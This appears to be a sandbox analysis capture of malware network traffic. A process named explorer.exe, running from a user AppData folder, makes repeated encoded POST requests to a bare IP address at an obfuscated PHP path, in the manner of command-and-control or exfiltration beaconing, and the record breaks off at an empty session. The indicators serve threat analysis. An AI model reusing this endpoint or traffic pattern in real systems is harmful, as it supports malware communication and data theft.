                                                      Dec 13, 2024 14:34:20.292579889 CET805006945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:20.292597055 CET805006945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:20.929460049 CET805006945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:21.072736025 CET5006980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:21.165213108 CET805006945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:21.280704975 CET5006980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:21.280941010 CET5007380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:21.400746107 CET805007345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:21.400845051 CET5007380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:21.400856972 CET805006945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:21.400928020 CET5006980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:21.400960922 CET5007380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:21.520714998 CET805007345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:21.750854015 CET5007380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:21.870995045 CET805007345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:21.871014118 CET805007345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:21.871098995 CET805007345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:22.569737911 CET805007345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:22.735174894 CET5007380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:22.793204069 CET805007345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:22.918627024 CET5007380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:22.918629885 CET5007680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:23.038772106 CET805007645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:23.038913012 CET5007680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:23.039052963 CET805007345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:23.039093971 CET5007680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:23.039205074 CET5007380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:23.159096003 CET805007645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:23.391490936 CET5007680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:23.511579990 CET805007645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:23.511625051 CET805007645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:23.511657000 CET805007645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.149754047 CET805007645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.235333920 CET5007680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.385487080 CET805007645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.513353109 CET5007680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.513834953 CET5007780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.633898973 CET805007745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.633948088 CET805007645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.634042025 CET5007680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.634083033 CET5007780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.634208918 CET5007780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.641966105 CET5007880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.645452023 CET5007780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.754046917 CET805007745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.761848927 CET805007845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.761970997 CET5007880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.762093067 CET5007880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.813168049 CET805007745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.831502914 CET5007980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.882616997 CET805007845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.951412916 CET805007945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:24.953876972 CET5007980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:24.953876972 CET5007980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:25.073695898 CET805007945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:25.110404968 CET5007880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:25.230266094 CET805007845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:25.230330944 CET805007845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:25.297841072 CET5007980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:25.418050051 CET805007945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:25.418091059 CET805007945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:25.418119907 CET805007945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:25.533502102 CET805007745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:25.533581018 CET5007780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:25.852176905 CET805007845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:25.922692060 CET5007880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.045969963 CET805007945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:26.085760117 CET805007845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:26.094738960 CET5007980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.235342979 CET5007880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.315097094 CET805007945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:26.391550064 CET5007980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.436319113 CET5007980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.436320066 CET5007880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.436667919 CET5008080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.557435989 CET805008045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:26.557651043 CET805007945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:26.557754993 CET5007980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.557954073 CET5008080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.557954073 CET5008080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.558162928 CET805007845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:26.558347940 CET5007880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:26.678296089 CET805008045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:26.907764912 CET5008080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:27.027852058 CET805008045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:27.028254986 CET805008045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:27.028456926 CET805008045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:27.643755913 CET805008045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:27.735311031 CET5008080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:27.877628088 CET805008045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:27.923098087 CET5008080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:28.000363111 CET5008080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:28.000672102 CET5008180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:28.120575905 CET805008145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:28.120671988 CET5008180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:28.120769024 CET805008045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:28.120868921 CET5008080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:28.120980024 CET5008180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:28.240786076 CET805008145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:28.469629049 CET5008180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:28.589498997 CET805008145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:28.589519978 CET805008145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:28.589544058 CET805008145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:29.220496893 CET805008145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:29.391449928 CET5008180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:29.456084967 CET805008145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:29.527440071 CET5008180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:29.577250957 CET5008180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:29.577594042 CET5008280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:29.697405100 CET805008145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:29.697472095 CET805008245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:29.697479010 CET5008180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:29.697568893 CET5008280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:29.697690964 CET5008280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:29.817464113 CET805008245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:30.047861099 CET5008280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:30.168009996 CET805008245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:30.168024063 CET805008245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:30.168047905 CET805008245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:30.791728020 CET805008245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:30.922723055 CET5008280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.025721073 CET805008245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:31.095505953 CET5008380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.095660925 CET5008280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.163011074 CET5008480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.215584040 CET805008345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:31.215699911 CET5008380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.215799093 CET805008245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:31.215964079 CET5008280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.283143044 CET805008445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:31.283224106 CET5008480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.283363104 CET5008480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.403126001 CET805008445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:31.641500950 CET5008480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:31.761518002 CET805008445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:31.761535883 CET805008445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:31.761550903 CET805008445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:32.369484901 CET805008445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:32.598375082 CET5008480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:32.601299047 CET805008445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:32.697962046 CET5008480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:32.719773054 CET5008480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:32.722871065 CET5008580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:32.840112925 CET805008445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:32.840282917 CET5008480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:32.842632055 CET805008545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:32.842798948 CET5008580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:32.843421936 CET5008580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:32.963479042 CET805008545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:33.188437939 CET5008580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:33.308876038 CET805008545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:33.308932066 CET805008545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:33.308962107 CET805008545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:33.953708887 CET805008545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:34.032053947 CET5008580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:34.189742088 CET805008545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:34.235196114 CET5008580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:34.310307980 CET5008580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:34.310312033 CET5008680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:34.430696964 CET805008645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:34.430835009 CET5008680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:34.430887938 CET805008545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:34.430922985 CET5008680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:34.430979013 CET5008580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:34.550853014 CET805008645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:34.782191038 CET5008680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:34.902770996 CET805008645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:34.902813911 CET805008645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:34.902843952 CET805008645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:35.520663023 CET805008645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:35.594568968 CET5008680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:35.754110098 CET805008645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:35.877134085 CET5008680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:35.877243042 CET5008780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:35.997303963 CET805008745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:35.997417927 CET5008780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:35.997486115 CET805008645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:35.997534990 CET5008780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:35.997560024 CET5008680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.117767096 CET805008745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:36.189310074 CET5008880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.189311981 CET5008780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.309041977 CET5008980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.309458017 CET805008845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:36.309623003 CET5008880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.309722900 CET5008880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.358558893 CET805008745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:36.429251909 CET805008945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:36.429344893 CET5008980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.429466963 CET5008980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.429562092 CET805008845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:36.549511909 CET805008945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:36.657773018 CET5008880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:36.778006077 CET805008845.88.91.89192.168.2.6
                                                      • 45.88.91.89
                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.6 | 49753 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:36.388613939 CET | 332 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 344
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:37.474585056 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:37.644917011 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Dec 13, 2024 14:32:38.491646051 CET | 308 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 384
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:38.806109905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:39.132133007 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Dec 13, 2024 14:32:39.165730953 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:39.480303049 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:39.851896048 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.6 | 49758 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:38.950464010 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:40.046741009 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:40.301660061 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.6 | 49766 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:41.386358023 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:42.459769964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:42.697562933 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.6 | 49771 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:42.991209030 CET | 309 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:44.077646017 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:44.321846962 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.6 | 49775 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:44.671328068 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.6 | 49778 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:44.981887102 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:45.329184055 CET | 1456 | OUT | Data Raw: 56 50 58 5c 56 58 55 55 5b 5f 52 55 59 5e 57 53 57 5b 5f 5e 50 53 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VPX\VXUU[_RUY^WSW[_^PSVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":#_38(?4Z0<?$?'+'']) 24&.6$>,$[' \,
                                                      Dec 13, 2024 14:32:46.067620039 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:46.301399946 CET | 349 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:45 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 03 2b 2a 3f 11 31 05 0d 09 27 2d 21 5e 3d 3f 35 59 2c 3c 37 02 24 42 3c 0d 2b 55 32 1c 29 1a 3c 02 3e 0d 2d 5a 23 2c 2f 0d 3a 36 2f 5f 0d 11 3b 01 23 2e 0b 00 2f 2d 23 12 29 2d 2d 15 3f 3f 1b 5f 3d 2d 20 10 30 02 32 53 26 03 2a 54 28 00 3c 0c 2b 28 30 5b 3a 02 22 04 24 25 2f 57 0d 1e 27 19 29 21 35 1d 20 28 23 07 36 2d 35 5a 29 34 25 0a 20 39 20 03 31 00 3a 07 27 3c 0d 0f 23 1d 20 10 27 33 2f 53 30 5f 2f 56 24 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$+*?1'-!^=?5Y,<7$B<+U2)<>-Z#,/:6/_;#./-#)--??_=- 02S&*T(<+(0[:"$%/W')!5 (#6-5Z)4% 9 1:'<# '3/S0_/V$/.P*)Q2TT0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.6 | 49779 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 13, 2024 14:32:45.116075993 CET | 333 | OUT | POST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:45.469696045 CET | 2568 | OUT | Data Raw: 56 54 5d 5c 56 5f 55 52 5b 5f 52 55 59 51 57 5f 57 5a 5f 5b 50 5e 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VT]\V_UR[_RUYQW_WZ_[P^VR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".'$-?S?<3<(V$,Y('<$)Y""#_$-!F%-3,$[' \,
                                                      Dec 13, 2024 14:32:46.235368967 CET | 25 | IN | HTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:46.469403028 CET | 200 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:46 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.6 | 49783 | 45.88.91.89 | 80 | 8088 | C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
